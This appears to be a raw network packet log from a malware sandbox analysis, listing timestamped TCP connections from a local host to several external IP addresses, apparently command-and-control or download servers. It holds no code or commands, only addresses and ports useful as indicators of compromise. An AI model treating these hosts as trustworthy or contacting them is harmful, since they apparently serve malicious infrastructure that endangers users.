                                                                          Sep 27, 2024 04:21:12.906266928 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.906316996 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.906337976 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.906347990 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.906362057 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.906383038 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.906395912 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.906420946 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.906420946 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.906420946 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.906672001 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.906686068 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.906697989 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.906712055 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.906723022 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.906761885 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.906761885 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.906761885 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.906923056 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.907215118 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.907227993 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.907238960 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.907254934 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.907265902 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.907278061 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.907308102 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.907308102 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.907308102 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.907402039 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.907744884 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.907756090 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.907768011 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.907826900 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.907838106 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.907849073 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.907874107 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.907874107 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.907874107 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.908464909 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.908477068 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.908488035 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.908520937 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.908531904 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.908544064 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.908545971 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.908545971 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.908545971 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.908557892 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.908602953 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.908602953 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.908622026 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.908694029 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.908694029 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.909190893 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.909231901 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.909243107 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.909269094 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.909269094 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.909271955 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.909302950 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.909353018 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.909365892 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.909379005 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.909389973 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.909389973 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.909390926 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.909599066 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.909599066 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.910063028 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.910118103 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.910129070 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.910192013 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.910192013 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.910218000 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.910232067 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.910410881 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:12.911068916 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:12.911345959 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.030594110 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.030611992 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.030637026 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.030644894 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.030647993 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.030667067 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.030679941 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.030699968 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.030716896 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.030730009 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.030742884 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.030742884 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.030742884 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.030742884 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.030766964 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.030797958 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.030812025 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.030822992 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.030857086 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.030857086 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.030875921 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.030896902 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.030909061 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.030921936 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031029940 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031042099 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031055927 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031064987 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031106949 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031106949 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031106949 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031147003 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031158924 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031169891 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031232119 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031244040 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031270027 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031270027 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031270027 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031310081 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031322956 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031336069 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031352043 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031352043 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031402111 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031404018 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031415939 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031428099 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031452894 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031478882 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031478882 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031501055 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031513929 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031524897 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031558990 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031558990 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031558990 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031594992 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031605005 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031673908 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031685114 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031697989 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031709909 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031738997 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031738997 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031738997 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031807899 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031820059 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031827927 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031835079 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031847954 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031874895 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031874895 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031874895 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031891108 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031908989 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031920910 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031959057 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.031960011 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.031960011 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.032027960 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.032040119 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.032049894 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.032069921 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.032149076 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.032165051 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.032165051 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.032165051 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.032177925 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.032357931 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.032357931 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.035568953 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.035609961 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.035623074 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.035635948 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.035666943 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.035666943 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.035666943 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.035696030 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.035708904 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.035722971 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.035734892 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.035763025 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.035795927 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.035795927 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.035795927 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.035840988 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.035854101 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.035865068 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.035876989 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.035888910 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.035914898 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.035914898 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.035990953 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036043882 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036056042 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036077023 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.036077023 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.036077023 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.036092043 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036104918 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036115885 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036151886 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.036225080 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036237001 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036248922 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036289930 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.036289930 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.036289930 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.036319971 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036333084 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036345005 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036355972 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036370993 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.036370993 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.036437988 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036485910 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036499977 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036513090 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.036513090 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.036593914 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036607981 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036621094 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036627054 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.036627054 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.036627054 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.036636114 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.036675930 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.036675930 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.036675930 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.089144945 CEST4972180192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:13.093934059 CEST8049721185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:13.094012022 CEST4972180192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:13.094140053 CEST4972180192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:13.098952055 CEST8049721185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:13.116631031 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.116646051 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.116657972 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.116698980 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.116698980 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.398376942 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:13.404449940 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:13.441564083 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:13.448715925 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:13.448791981 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:13.448975086 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:13.455471039 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:13.595031023 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:13.595057011 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:13.595067024 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:13.595084906 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:13.595189095 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:13.595189095 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:13.595211029 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:13.595225096 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:13.595263004 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:13.771240950 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.771632910 CEST4972380192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.776983023 CEST8049720185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.777018070 CEST8049723185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.777041912 CEST4972080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.777144909 CEST4972380192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.777290106 CEST4972380192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:13.782269955 CEST8049723185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:13.800390959 CEST8049721185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:13.800458908 CEST4972180192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:13.801392078 CEST4972180192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:13.806195021 CEST8049721185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:13.817728043 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:13.822701931 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:14.011305094 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:14.032385111 CEST8049721185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:14.032502890 CEST4972180192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:14.082077026 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:14.083125114 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:14.086992979 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:14.087063074 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:14.087455988 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:14.092336893 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:14.167699099 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:14.167767048 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:14.176244974 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:14.179357052 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:14.181232929 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:14.184179068 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:14.369162083 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:14.411206961 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:14.482192039 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:14.487076998 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:14.490046978 CEST8049723185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:14.491667032 CEST4972380192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:14.537872076 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:14.538491011 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:14.543235064 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:14.543286085 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:14.543693066 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:14.543822050 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:14.544011116 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:14.548779011 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:14.674274921 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:14.682022095 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:14.686861992 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:14.686952114 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:14.686960936 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:14.687067032 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:14.687076092 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:14.687158108 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:14.971020937 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:14.973067045 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:14.979063034 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:14.987613916 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:14.987627029 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:14.987690926 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:14.987731934 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:14.987782001 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:14.987795115 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:14.987807035 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:14.987818956 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:14.987823009 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:14.987832069 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:14.987844944 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:14.987855911 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:14.987875938 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:14.987910986 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:14.987948895 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:14.987962961 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:14.988003969 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:14.993784904 CEST8049724176.113.115.95192.168.2.5
